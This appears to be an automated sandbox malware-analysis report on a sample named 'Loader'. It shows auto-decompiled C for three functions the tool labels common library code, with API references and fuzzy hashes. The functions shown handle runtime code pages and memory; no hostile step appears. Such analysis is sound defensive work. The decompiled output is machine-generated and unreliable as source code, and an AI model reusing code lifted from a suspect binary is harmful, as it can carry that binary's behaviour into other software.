Instruction Fuzzy Hash: 43F01C35601619FBDB21AB91DD09FAEBEB9EF00796F1040A4F905A21A1DF708E01DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00AF2E32 Relevance: 7.8, APIs: 5, Instructions: 255
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 72%

			E00AF2E32(void* __ebx, void* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				short _v270;
				short _v272;
				char _v528;
				char _v700;
				signed int _v704;
				short _v706;
				signed int _v708;
				signed int _v712;
				signed int _v716;
				intOrPtr _v720;
				signed int _v724;
				intOrPtr _v728;
				signed int* _v732;
				signed int _v736;
				signed int _v740;
				signed int _v744;
				intOrPtr _v772;
				signed int _v784;
				void* __ebp;
				signed int _t156;
				void* _t163;
				signed int _t164;
				signed int _t166;
				signed int _t167;
				intOrPtr _t168;
				signed int _t171;
				signed int _t173;
				signed int _t174;
				signed int _t177;
				signed int _t179;
				signed int _t182;
				signed int _t183;
				signed int _t185;
				signed int _t186;
				signed int _t202;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t212;
				void* _t213;
				signed int _t220;
				intOrPtr* _t221;
				char* _t228;
				intOrPtr _t232;
				intOrPtr* _t233;
				signed int _t235;
				signed int _t240;
				signed int _t241;
				intOrPtr _t246;
				void* _t247;
				void* _t250;
				signed int _t252;
				signed int _t254;
				signed int _t257;
				signed int* _t258;
				short _t259;
				signed int _t260;
				void* _t262;
				void* _t263;
				void* _t264;

				_t244 = __edx;
				_t156 =  *0xb36bac; // 0x85d5fe2b
				_v8 = _t156 ^ _t260;
				_push(__ebx);
				_t212 = _a8;
				_push(__esi);
				_push(__edi);
				_t246 = _a4;
				_v736 = _t212;
				_v732 = E00AF4840(__ecx, __edx) + 0x278;
				_t163 = E00AF251D(_t212, __edx, _t246, _a12, _a12,  &_v272, 0x83,  &_v700, 0x55,  &_v716);
				_t263 = _t262 + 0x18;
				if(_t163 == 0) {
					L39:
					_t164 = 0;
					__eflags = 0;
					goto L40;
				} else {
					_t10 = _t212 + 2; // 0x6
					_t252 = _t10 << 4;
					_t166 =  &_v272;
					_v712 = _t252;
					_t244 =  *(_t252 + _t246);
					_t220 = _t244;
					while(1) {
						_v704 = _v704 & 0x00000000;
						_t254 = _v712;
						if( *_t166 !=  *_t220) {
							break;
						}
						if( *_t166 == 0) {
							L6:
							_t167 = _v704;
						} else {
							_t259 =  *((intOrPtr*)(_t166 + 2));
							_v706 = _t259;
							_t254 = _v712;
							if(_t259 !=  *((intOrPtr*)(_t220 + 2))) {
								break;
							} else {
								_t166 = _t166 + 4;
								_t220 = _t220 + 4;
								if(_v706 != 0) {
									continue;
								} else {
									goto L6;
								}
							}
						}
						L8:
						if(_t167 != 0) {
							_t221 =  &_v272;
							_t244 = _t221 + 2;
							do {
								_t168 =  *_t221;
								_t221 = _t221 + 2;
								__eflags = _t168 - _v704;
							} while (_t168 != _v704);
							_v708 = (_t221 - _t244 >> 1) + 1;
							_t171 = E00AF548F(4 + ((_t221 - _t244 >> 1) + 1) * 2);
							_v724 = _t171;
							__eflags = _t171;
							if(_t171 == 0) {
								goto L39;
							} else {
								_v720 =  *((intOrPtr*)(_t254 + _t246));
								_v740 =  *(_t246 + 0xa0 + _t212 * 4);
								_v744 =  *(_t246 + 8);
								_t228 =  &_v272;
								_v728 = _t171 + 4;
								_t173 = E00AF7AB0(_t171 + 4, _v708, _t228);
								_t264 = _t263 + 0xc;
								__eflags = _t173;
								if(_t173 != 0) {
									_t174 = _v704;
									_push(_t174);
									_push(_t174);
									_push(_t174);
									_push(_t174);
									_push(_t174);
									E00AED26C();
									asm("int3");
									_push(_t260);
									_push(_t228);
									_v784 = _v784 & 0x00000000;
									_t177 = E00AF6BA9(_v772, 0x20001004,  &_v784, 2);
									__eflags = _t177;
									if(_t177 == 0) {
										L49:
										return 0xfde9;
									}
									_t179 = _v12;
									__eflags = _t179;
									if(_t179 == 0) {
										goto L49;
									}
									return _t179;
								} else {
									__eflags = _v272 - 0x43;
									 *((intOrPtr*)(_t254 + _t246)) = _v728;
									if(_v272 != 0x43) {
										L17:
										_t182 = E00AF223A(_t212, _t246,  &_v700);
										_t244 = _v704;
									} else {
										__eflags = _v270;
										if(_v270 != 0) {
											goto L17;
										} else {
											_t244 = _v704;
											_t182 = _t244;
										}
									}
									 *(_t246 + 0xa0 + _t212 * 4) = _t182;
									__eflags = _t212 - 2;
									if(_t212 != 2) {
										__eflags = _t212 - 1;
										if(_t212 != 1) {
											__eflags = _t212 - 5;
											if(_t212 == 5) {
												 *((intOrPtr*)(_t246 + 0x14)) = _v716;
											}
										} else {
											 *((intOrPtr*)(_t246 + 0x10)) = _v716;
										}
									} else {
										_t258 = _v732;
										 *(_t246 + 8) = _v716;
										_v708 = _t258[8];
										_t240 = _t258[9];
										_v716 = _t240;
										while(1) {
											__eflags =  *(_t246 + 8) -  *(_t258 + _t244 * 8);
											if( *(_t246 + 8) ==  *(_t258 + _t244 * 8)) {
												break;
											}
											_t210 =  *(_t258 + _t244 * 8);
											_t240 =  *(_t258 + 4 + _t244 * 8);
											 *(_t258 + _t244 * 8) = _v708;
											 *(_t258 + 4 + _t244 * 8) = _v716;
											_t244 = _t244 + 1;
											_t212 = _v736;
											_v708 = _t210;
											_v716 = _t240;
											__eflags = _t244 - 5;
											if(_t244 < 5) {
												continue;
											} else {
											}
											L25:
											__eflags = _t244 - 5;
											if(__eflags == 0) {
												_t202 = E00AF777A(__eflags, _v704, 1, 0xb094d8, 0x7f,  &_v528,  *(_t246 + 8), 1);
												_t264 = _t264 + 0x1c;
												__eflags = _t202;
												if(_t202 == 0) {
													_t241 = _v704;
												} else {
													_t204 = _v704;
													do {
														 *(_t260 + _t204 * 2 - 0x20c) =  *(_t260 + _t204 * 2 - 0x20c) & 0x000001ff;
														_t204 = _t204 + 1;
														__eflags = _t204 - 0x7f;
													} while (_t204 < 0x7f);
													_t206 = E00AEAC10( &_v528,  *0xb36d14, 0xfe);
													_t264 = _t264 + 0xc;
													__eflags = _t206;
													_t241 = 0 | _t206 == 0x00000000;
												}
												_t258[1] = _t241;
												 *_t258 =  *(_t246 + 8);
											}
											 *(_t246 + 0x18) = _t258[1];
											goto L37;
										}
										__eflags = _t244;
										if(_t244 != 0) {
											 *_t258 =  *(_t258 + _t244 * 8);
											_t258[1] =  *(_t258 + 4 + _t244 * 8);
											 *(_t258 + _t244 * 8) = _v708;
											 *(_t258 + 4 + _t244 * 8) = _t240;
										}
										goto L25;
									}
									L37:
									_t183 = _t212 * 0xc;
									_t111 = _t183 + 0xb09560; // 0xae861f
									 *0xb05148(_t246);
									_t185 =  *((intOrPtr*)( *_t111))();
									_t232 = _v720;
									__eflags = _t185;
									if(_t185 == 0) {
										__eflags = _t232 - 0xb36de8;
										if(_t232 == 0xb36de8) {
											L44:
											_t186 = _v712;
										} else {
											_t257 = _t212 + _t212;
											__eflags = _t257;
											asm("lock xadd [eax], ecx");
											if(_t257 != 0) {
												goto L44;
											} else {
												E00AF4AEF( *((intOrPtr*)(_t246 + 0x28 + _t257 * 8)));
												E00AF4AEF( *((intOrPtr*)(_t246 + 0x24 + _t257 * 8)));
												E00AF4AEF( *(_t246 + 0xa0 + _t212 * 4));
												_t186 = _v712;
												_t235 = _v704;
												 *(_t186 + _t246) = _t235;
												 *(_t246 + 0xa0 + _t212 * 4) = _t235;
											}
										}
										_t233 = _v724;
										 *_t233 = 1;
										_t164 =  *(_t186 + _t246);
										 *((intOrPtr*)(_t246 + 0x28 + (_t212 + _t212) * 8)) = _t233;
									} else {
										 *((intOrPtr*)(_v712 + _t246)) = _t232;
										E00AF4AEF( *(_t246 + 0xa0 + _t212 * 4));
										 *(_t246 + 0xa0 + _t212 * 4) = _v740;
										E00AF4AEF(_v724);
										 *(_t246 + 8) = _v744;
										goto L39;
									}
									goto L40;
								}
							}
						} else {
							_t164 = _t244;
							L40:
							_pop(_t247);
							_pop(_t250);
							_pop(_t213);
							return E00AE95ED(_t164, _t213, _v8 ^ _t260, _t244, _t247, _t250);
						}
						goto L51;
					}
					asm("sbb eax, eax");
					_t167 = _t166 | 0x00000001;
					__eflags = _t167;
					goto L8;
				}
				L51:
			}

0x00af2e32
0x00af2e3d
0x00af2e44
0x00af2e47
0x00af2e48
0x00af2e4b
0x00af2e4f
0x00af2e50
0x00af2e53
0x00af2e63
0x00af2e86
0x00af2e8b
0x00af2e90
0x00af3146
0x00af3146
0x00af3146
0x00000000
0x00af2e96
0x00af2e96
0x00af2e99
0x00af2e9c
0x00af2ea2
0x00af2ea8
0x00af2eab
0x00af2ead
0x00af2eb0
0x00af2eba
0x00af2ec0
0x00000000
0x00000000
0x00af2ec6
0x00af2eef
0x00af2eef
0x00af2ec8
0x00af2ec8
0x00af2ed0
0x00af2ed7
0x00af2edd
0x00000000
0x00af2edf
0x00af2edf
0x00af2ee2
0x00af2eed
0x00000000
0x00000000
0x00000000
0x00000000
0x00af2eed
0x00af2edd
0x00af2efc
0x00af2efe
0x00af2f07
0x00af2f0d
0x00af2f10
0x00af2f10
0x00af2f13
0x00af2f16
0x00af2f16
0x00af2f26
0x00af2f34
0x00af2f39
0x00af2f40
0x00af2f42
0x00000000
0x00af2f48
0x00af2f4e
0x00af2f5b
0x00af2f64
0x00af2f6a
0x00af2f77
0x00af2f7e
0x00af2f83
0x00af2f86
0x00af2f88
0x00af31c6
0x00af31cc
0x00af31cd
0x00af31ce
0x00af31cf
0x00af31d0
0x00af31d1
0x00af31d6
0x00af31d9
0x00af31dc
0x00af31dd
0x00af31ef
0x00af31f4
0x00af31f6
0x00af31ff
0x00000000
0x00af31ff
0x00af31f8
0x00af31fb
0x00af31fd
0x00000000
0x00000000
0x00af3205
0x00af2f8e
0x00af2f8e
0x00af2f9c
0x00af2f9f
0x00af2fb5
0x00af2fbc
0x00af2fc1
0x00af2fa1
0x00af2fa1
0x00af2fa9
0x00000000
0x00af2fab
0x00af2fab
0x00af2fb1
0x00af2fb1
0x00af2fa9
0x00af2fc8
0x00af2fcf
0x00af2fd2
0x00af30d0
0x00af30d3
0x00af30e0
0x00af30e3
0x00af30eb
0x00af30eb
0x00af30d5
0x00af30db
0x00af30db
0x00af2fd8
0x00af2fd8
0x00af2fe4
0x00af2fea
0x00af2ff0
0x00af2ff3
0x00af2ff9
0x00af2ffc
0x00af2fff
0x00000000
0x00000000
0x00af3001
0x00af300a
0x00af300e
0x00af3017
0x00af301b
0x00af301c
0x00af3022
0x00af3028
0x00af302e
0x00af3031
0x00000000
0x00000000
0x00af3033
0x00af3052
0x00af3052
0x00af3055
0x00af3072
0x00af3077
0x00af307a
0x00af307c
0x00af30ba
0x00af307e
0x00af307e
0x00af3084
0x00af3089
0x00af3091
0x00af3092
0x00af3092
0x00af30a9
0x00af30b0
0x00af30b3
0x00af30b5
0x00af30b5
0x00af30c0
0x00af30c6
0x00af30c6
0x00af30cb
0x00000000
0x00af30cb
0x00af3035
0x00af3037
0x00af303c
0x00af3042
0x00af304b
0x00af304e
0x00af304e
0x00000000
0x00af3037
0x00af30ee
0x00af30ee
0x00af30f2
0x00af30fa
0x00af3100
0x00af3103
0x00af3109
0x00af310b
0x00af3157
0x00af315d
0x00af31a9
0x00af31a9
0x00af315f
0x00af3164
0x00af3164
0x00af316a
0x00af316e
0x00000000
0x00af3170
0x00af3174
0x00af317d
0x00af3189
0x00af318e
0x00af3197
0x00af319d
0x00af31a0
0x00af31a0
0x00af316e
0x00af31af
0x00af31b7
0x00af31bd
0x00af31c0
0x00af310d
0x00af3113
0x00af311d
0x00af312f
0x00af3136
0x00af3143
0x00000000
0x00af3143
0x00000000
0x00af310b
0x00af2f88
0x00af2f00
0x00af2f00
0x00af3148
0x00af314b
0x00af314c
0x00af314f
0x00af3156
0x00af3156
0x00000000
0x00af2efe
0x00af2ef7
0x00af2ef9
0x00af2ef9
0x00000000
0x00af2ef9
0x00000000

APIs

Part of subcall function 00AF4840: GetLastError.KERNEL32(?,00000000,?,00AED8CE,00000000,00000000,?,?,00AF6FF2,00000000,00000000,?,00000000,?), ref: 00AF4845
Part of subcall function 00AF4840: SetLastError.KERNEL32(00000000,00000005,000000FF,?,00AF6FF2,00000000,00000000,?,00000000,?), ref: 00AF48E3

_free.LIBCMT ref: 00AF311D
_free.LIBCMT ref: 00AF3136
_free.LIBCMT ref: 00AF3174
_free.LIBCMT ref: 00AF317D
_free.LIBCMT ref: 00AF3189

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast
String ID:
API String ID: 3291180501-0
Opcode ID: 42e369b980e09b5bb1075f044ed54edb1c48d245cd73f24a3264185e372b4848
Instruction ID: 2570fd9c775378ba378a882df09ba3bd675cb78446f2e55b0a2a46b3eae3fd43
Opcode Fuzzy Hash: 42e369b980e09b5bb1075f044ed54edb1c48d245cd73f24a3264185e372b4848
Instruction Fuzzy Hash: A4B15D75A012199FDF24DF58C884BAEB7B5FF48304F6045AAE949A7350EB71AE90CF40

Uniqueness

Uniqueness Score: -1.00%

Function 00B03265 Relevance: 7.7, APIs: 5, Instructions: 244
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 88%

			E00B03265(signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr* _a24, intOrPtr _a28, int _a32) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				intOrPtr* _v32;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				intOrPtr _v48;
				void* _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t55;
				intOrPtr* _t60;
				int _t62;
				signed int _t65;
				signed int _t66;
				intOrPtr* _t67;
				void* _t69;
				signed int _t70;
				signed int _t71;
				intOrPtr* _t77;
				char* _t79;
				char* _t80;
				intOrPtr _t95;
				intOrPtr _t96;
				intOrPtr* _t102;
				signed int _t104;
				void* _t105;
				intOrPtr* _t107;
				void* _t108;
				intOrPtr* _t109;

				_t55 =  *0xb36bac; // 0x85d5fe2b
				_v8 = _t55 ^ _t104;
				_t103 = _a20;
				_v44 = _a4;
				_v48 = _a8;
				_t59 = _a24;
				_v40 = _a24;
				_t102 = _a16;
				_v36 = _t102;
				if(_t103 <= 0) {
					if(_t103 < 0xffffffff) {
						goto L60;
					} else {
						goto L3;
					}
				} else {
					_t103 = E00AF0E9D(_t102, _t103);
					_t59 = _v40;
					L3:
					_t85 = _a28;
					if(_t85 <= 0) {
						if(_t85 < 0xffffffff) {
							goto L60;
						} else {
							goto L6;
						}
					} else {
						_t85 = E00AF0E9D(_t59, _t85);
						L6:
						_t62 = _a32;
						if(_t62 == 0) {
							_t62 =  *( *_v44 + 8);
							_a32 = _t62;
						}
						if(_t103 == 0 || _t85 == 0) {
							if(_t103 == _t85) {
								L59:
								_push(2);
								goto L22;
							} else {
								if(_t85 > 1) {
									L31:
									_t60 = 1;
								} else {
									if(_t103 > 1) {
										L21:
										_push(3);
										goto L22;
									} else {
										if(GetCPInfo(_t62,  &_v28) == 0) {
											goto L60;
										} else {
											if(_t103 <= 0) {
												if(_t85 <= 0) {
													goto L32;
												} else {
													if(_v28 >= 2) {
														_t79 =  &_v22;
														if(_v22 != 0) {
															_t103 = _v40;
															while(1) {
																_t95 =  *((intOrPtr*)(_t79 + 1));
																if(_t95 == 0) {
																	goto L31;
																}
																_t101 =  *_t103;
																if(_t101 <  *_t79 || _t101 > _t95) {
																	_t79 = _t79 + 2;
																	if( *_t79 != 0) {
																		continue;
																	} else {
																		goto L31;
																	}
																} else {
																	goto L59;
																}
																goto L61;
															}
														}
													}
													goto L31;
												}
											} else {
												if(_v28 >= 2) {
													_t80 =  &_v22;
													if(_v22 != 0) {
														while(1) {
															_t96 =  *((intOrPtr*)(_t80 + 1));
															if(_t96 == 0) {
																goto L21;
															}
															_t101 =  *_t102;
															if(_t101 <  *_t80 || _t101 > _t96) {
																_t80 = _t80 + 2;
																if( *_t80 != 0) {
																	continue;
																} else {
																	goto L21;
																}
															} else {
																goto L59;
															}
															goto L22;
														}
													}
												}
												goto L21;
												L22:
												_pop(_t60);
											}
										}
									}
								}
							}
						} else {
							L32:
							_t102 = 0;
							_t65 = E00AFB685(_a32, 9, _v36, _t103, 0, 0);
							_t107 = _t105 + 0x18;
							_v44 = _t65;
							if(_t65 == 0) {
								L60:
								_t60 = 0;
							} else {
								_t101 = _t65 + _t65 + 8;
								asm("sbb eax, eax");
								_t66 = _t65 & _t65 + _t65 + 0x00000008;
								if(_t66 == 0) {
									_t67 = 0;
									_v32 = 0;
									goto L41;
								} else {
									if(_t66 > 0x400) {
										_t77 = E00AF548F(_t66);
										_v32 = _t77;
										if(_t77 == 0) {
											goto L57;
										} else {
											 *_t77 = 0xdddd;
											goto L39;
										}
									} else {
										E00AE96C0(_t66);
										_t77 = _t107;
										_v32 = _t77;
										if(_t77 == 0) {
											L57:
											_t85 = _v32;
										} else {
											 *_t77 = 0xcccc;
											L39:
											_t67 = _t77 + 8;
											_v32 = _t67;
											L41:
											if(_t67 == 0) {
												goto L57;
											} else {
												_t103 = _a32;
												_t69 = E00AFB685(_a32, 1, _v36, _a32, _t67, _v44);
												_t108 = _t107 + 0x18;
												if(_t69 == 0) {
													goto L57;
												} else {
													_t70 = E00AFB685(_t103, 9, _v40, _t85, _t102, _t102);
													_t109 = _t108 + 0x18;
													_v36 = _t70;
													if(_t70 == 0) {
														goto L57;
													} else {
														_t101 = _t70 + _t70 + 8;
														asm("sbb eax, eax");
														_t71 = _t70 & _t70 + _t70 + 0x00000008;
														if(_t71 == 0) {
															_t103 = _t102;
															goto L52;
														} else {
															if(_t71 > 0x400) {
																_t103 = E00AF548F(_t71);
																if(_t103 == 0) {
																	goto L55;
																} else {
																	 *_t103 = 0xdddd;
																	goto L50;
																}
															} else {
																E00AE96C0(_t71);
																_t103 = _t109;
																if(_t103 == 0) {
																	L55:
																	_t85 = _v32;
																} else {
																	 *_t103 = 0xcccc;
																	L50:
																	_t103 = _t103 + 8;
																	L52:
																	if(_t103 == 0 || E00AFB685(_a32, 1, _v40, _t85, _t103, _v36) == 0) {
																		goto L55;
																	} else {
																		_t85 = _v32;
																		_t102 = E00AF69F9(_v48, _a12, _v32, _v44, _t103, _v36, _t102, _t102, _t102);
																	}
																}
															}
														}
														E00AE8EDF(_t103);
													}
												}
											}
										}
									}
								}
								E00AE8EDF(_t85);
								_t60 = _t102;
							}
						}
					}
				}
				L61:
				return E00AE95ED(_t60, _t85, _v8 ^ _t104, _t101, _t102, _t103);
			}

0x00b0326d
0x00b03274
0x00b0327c
0x00b0327f
0x00b03285
0x00b03288
0x00b0328b
0x00b0328f
0x00b03292
0x00b03297
0x00b032ac
0x00000000
0x00000000
0x00000000
0x00000000
0x00b03299
0x00b032a1
0x00b032a3
0x00b032b2
0x00b032b2
0x00b032b7
0x00b032c9
0x00000000
0x00000000
0x00000000
0x00000000
0x00b032b9
0x00b032c2
0x00b032cf
0x00b032cf
0x00b032d4
0x00b032db
0x00b032de
0x00b032de
0x00b032e3
0x00b032ef
0x00b034d5
0x00b034d5
0x00000000
0x00b032f5
0x00b032f8
0x00b03381
0x00b03383
0x00b032fe
0x00b03301
0x00b03346
0x00b03346
0x00000000
0x00b03303
0x00b03310
0x00000000
0x00b03316
0x00b03318
0x00b03350
0x00000000
0x00b03352
0x00b03356
0x00b0335c
0x00b0335f
0x00b03361
0x00b03364
0x00b03364
0x00b03369
0x00000000
0x00000000
0x00b0336b
0x00b0336f
0x00b03379
0x00b0337f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00b0336f
0x00b03364
0x00b0335f
0x00000000
0x00b03356
0x00b0331a
0x00b0331e
0x00b03324
0x00b03327
0x00b03329
0x00b03329
0x00b0332e
0x00000000
0x00000000
0x00b03330
0x00b03334
0x00b0333e
0x00b03344
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00b03334
0x00b03329
0x00b03327
0x00000000
0x00b03348
0x00b03348
0x00b03348
0x00b03318
0x00b03310
0x00b03301
0x00b032f8
0x00b03389
0x00b03389
0x00b03389
0x00b03396
0x00b0339b
0x00b0339e
0x00b033a3
0x00b034dc
0x00b034dc
0x00b033a9
0x00b033ac
0x00b033b1
0x00b033b3
0x00b033b5
0x00b033f8
0x00b033fa
0x00000000
0x00b033b7
0x00b033bc
0x00b033d9
0x00b033de
0x00b033e4
0x00000000
0x00b033ea
0x00b033ea
0x00000000
0x00b033ea
0x00b033be
0x00b033be
0x00b033c3
0x00b033c5
0x00b033ca
0x00b034c7
0x00b034c7
0x00b033d0
0x00b033d0
0x00b033f0
0x00b033f0
0x00b033f3
0x00b033fd
0x00b033ff
0x00000000
0x00b03405
0x00b0340d
0x00b03413
0x00b03418
0x00b0341d
0x00000000
0x00b03423
0x00b0342c
0x00b03431
0x00b03434
0x00b03439
0x00000000
0x00b0343f
0x00b03442
0x00b03447
0x00b03449
0x00b0344b
0x00b0347f
0x00000000
0x00b0344d
0x00b03452
0x00b0346d
0x00b03472
0x00000000
0x00b03474
0x00b03474
0x00000000
0x00b03474
0x00b03454
0x00b03454
0x00b03459
0x00b0345d
0x00b034bb
0x00b034bb
0x00b0345f
0x00b0345f
0x00b0347a
0x00b0347a
0x00b03481
0x00b03483
0x00000000
0x00b0349e
0x00b0349e
0x00b034b7
0x00b034b7
0x00b03483
0x00b0345d
0x00b03452
0x00b034bf
0x00b034c4
0x00b03439
0x00b0341d
0x00b033ff
0x00b033ca
0x00b033bc
0x00b034cb
0x00b034d1
0x00b034d1
0x00b033a3
0x00b032e3
0x00b032b7
0x00b034de
0x00b034ef

APIs

GetCPInfo.KERNEL32(007CFA58,007CFA58,?,7FFFFFFF,?,?,00B03521,007CFA58,007CFA58,?,007CFA58,?,?,?,?,007CFA58), ref: 00B03308
__alloca_probe_16.LIBCMT ref: 00B033BE
__alloca_probe_16.LIBCMT ref: 00B03454
__freea.LIBCMT ref: 00B034BF
__freea.LIBCMT ref: 00B034CB

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID: __alloca_probe_16__freea$Info
String ID:
API String ID: 2330168043-0
Opcode ID: b7992cf229825d7a5e51c2175fa3fd883813c3ee17f51a1ec17e22240b22e362
Instruction ID: f892696a3385cf3b14df1af0209d1a7a8f584159d46f55253d5f2a35cab7ed35
Opcode Fuzzy Hash: b7992cf229825d7a5e51c2175fa3fd883813c3ee17f51a1ec17e22240b22e362
Instruction Fuzzy Hash: 3081A171D002599FDF219FA58889AEE7FFDDF09B50F180199E904AB2C1DB25DE40CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00AF787D Relevance: 7.7, APIs: 5, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00AF787D(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				intOrPtr _v12;
				void* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t41;
				signed int _t49;
				void* _t51;
				signed int _t55;
				intOrPtr _t63;
				intOrPtr _t69;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr _t86;
				void* _t89;
				intOrPtr* _t91;
				intOrPtr _t93;
				void* _t94;
				void* _t95;
				signed int _t96;
				void* _t97;
				intOrPtr* _t98;
				intOrPtr* _t100;
				void* _t103;

				_push(__ecx);
				_push(__ecx);
				_t41 =  *0xb36bac; // 0x85d5fe2b
				_v8 = _t41 ^ _t96;
				_t93 = _a20;
				if(_t93 > 0) {
					_t69 = E00AF0E9D(_a16, _t93);
					_t103 = _t69 - _t93;
					_t4 = _t69 + 1; // 0x1
					_t93 = _t4;
					if(_t103 >= 0) {
						_t93 = _t69;
					}
				}
				_t88 = _a32;
				if(_a32 == 0) {
					_t88 =  *((intOrPtr*)( *_a4 + 8));
					_a32 =  *((intOrPtr*)( *_a4 + 8));
				}
				_t86 = E00AFB685(_t88, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t93, 0, 0);
				_t98 = _t97 + 0x18;
				_v12 = _t86;
				if(_t86 == 0) {
					L39:
					_pop(_t89);
					_pop(_t94);
					_pop(_t71);
					return E00AE95ED(_t46, _t71, _v8 ^ _t96, _t86, _t89, _t94);
				} else {
					_t17 = _t86 + _t86 + 8; // 0x8
					asm("sbb eax, eax");
					_t49 = _t86 + _t86 & _t17;
					if(_t49 == 0) {
						_t72 = 0;
						L15:
						if(_t72 == 0) {
							L37:
							_t95 = 0;
							L38:
							E00AE8EDF(_t72);
							_t46 = _t95;
							goto L39;
						}
						_t51 = E00AFB685(_t88, 1, _a16, _t93, _t72, _t86);
						_t100 = _t98 + 0x18;
						if(_t51 == 0) {
							goto L37;
						}
						_t90 = _v12;
						_t95 = E00AF6CE6(_a8, _a12, _t72, _v12, 0, 0, 0, 0, 0);
						if(_t95 == 0) {
							goto L37;
						}
						_t86 = 0x400;
						if((_a12 & 0x00000400) == 0) {
							_t31 = _t95 + _t95 + 8; // 0x8
							asm("sbb eax, eax");
							_t55 = _t95 + _t95 & _t31;
							if(_t55 == 0) {
								_t91 = 0;
								L31:
								if(_t91 == 0 || E00AF6CE6(_a8, _a12, _t72, _v12, _t91, _t95, 0, 0, 0) == 0) {
									L36:
									E00AE8EDF(_t91);
									goto L37;
								} else {
									_push(0);
									_push(0);
									if(_a28 != 0) {
										_push(_a28);
										_push(_a24);
									} else {
										_push(0);
										_push(0);
									}
									_push(_t95);
									_push(_t91);
									_push(0);
									_push(_a32);
									_t95 = E00AFB701();
									if(_t95 != 0) {
										E00AE8EDF(_t91);
										goto L38;
									} else {
										goto L36;
									}
								}
							}
							if(_t55 > 0x400) {
								_t91 = E00AF548F(_t55);
								if(_t91 == 0) {
									goto L36;
								}
								 *_t91 = 0xdddd;
								L29:
								_t91 = _t91 + 8;
								goto L31;
							}
							E00AE96C0(_t55);
							_t91 = _t100;
							if(_t91 == 0) {
								goto L36;
							}
							 *_t91 = 0xcccc;
							goto L29;
						}
						_t63 = _a28;
						if(_t63 == 0) {
							goto L38;
						}
						if(_t95 > _t63) {
							goto L37;
						}
						_t95 = E00AF6CE6(_a8, _a12, _t72, _t90, _a24, _t63, 0, 0, 0);
						if(_t95 != 0) {
							goto L38;
						}
						goto L37;
					}
					if(_t49 > 0x400) {
						_t72 = E00AF548F(_t49);
						if(_t72 == 0) {
							L13:
							_t86 = _v12;
							goto L15;
						}
						 *_t72 = 0xdddd;
						L12:
						_t72 = _t72 + 8;
						goto L13;
					}
					E00AE96C0(_t49);
					_t72 = _t98;
					if(_t72 == 0) {
						goto L13;
					}
					 *_t72 = 0xcccc;
					goto L12;
				}
			}

0x00af7882
0x00af7883
0x00af7884
0x00af788b
0x00af7890
0x00af7896
0x00af789c
0x00af78a2
0x00af78a5
0x00af78a5
0x00af78a8
0x00af78aa
0x00af78aa
0x00af78a8
0x00af78ac
0x00af78b1
0x00af78b8
0x00af78bb
0x00af78bb
0x00af78dc
0x00af78de
0x00af78e1
0x00af78e6
0x00af7a44
0x00af7a47
0x00af7a48
0x00af7a49
0x00af7a55
0x00af78ec
0x00af78ef
0x00af78f4
0x00af78f6
0x00af78f8
0x00af792f
0x00af7931
0x00af7933
0x00af7a39
0x00af7a39
0x00af7a3b
0x00af7a3c
0x00af7a42
0x00000000
0x00af7a42
0x00af7942
0x00af7947
0x00af794c
0x00000000
0x00000000
0x00af7952
0x00af7969
0x00af796d
0x00000000
0x00000000
0x00af7973
0x00af797b
0x00af79b8
0x00af79bd
0x00af79bf
0x00af79c1
0x00af79f2
0x00af79f4
0x00af79f6
0x00af7a32
0x00af7a33
0x00000000
0x00af7a13
0x00af7a15
0x00af7a16
0x00af7a1a
0x00af7a56
0x00af7a59
0x00af7a1c
0x00af7a1c
0x00af7a1d
0x00af7a1d
0x00af7a1e
0x00af7a1f
0x00af7a20
0x00af7a21
0x00af7a29
0x00af7a30
0x00af7a5f
0x00000000
0x00000000
0x00000000
0x00000000
0x00af7a30
0x00af79f6
0x00af79c5
0x00af79e0
0x00af79e5
0x00000000
0x00000000
0x00af79e7
0x00af79ed
0x00af79ed
